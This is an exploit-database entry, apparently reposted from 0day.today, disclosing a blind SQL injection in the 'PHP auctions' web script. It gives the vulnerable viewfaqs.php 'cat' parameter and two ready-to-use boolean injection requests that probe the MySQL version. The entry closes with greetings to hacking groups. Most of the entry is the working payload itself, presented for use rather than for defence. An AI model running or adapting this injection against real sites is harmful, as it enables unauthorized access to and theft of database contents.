id: 15320
date: 01/20/2011
title: PHP auctions (viewfaqs.php) Blind SQL Injection Vulnerability
author: BorN To K!LL
cves: 

==
[#]Script: PHP auctions
[#]Version: n/a
[#]Link: http://phpauctions.info
==
[#]Author: BorN To K!LL - h4ck3r
[#]Contact: SQL@hotmail.co.uk
==
[#]3xploit:
/viewfaqs.php?cat=[Blind-Injection]
 
[#]3xample:
/viewfaqs.php?cat=2 and substring(version(),1,1)=4             // false ,,
/viewfaqs.php?cat=2 and substring(version(),1,1)=5            // true ,,
 
==
[#]Greetings:
darkc0de team, AsbMay's group, w4ck1ng team , and "Kuwaitis"
==



#  0day.today [2023-03-24]  #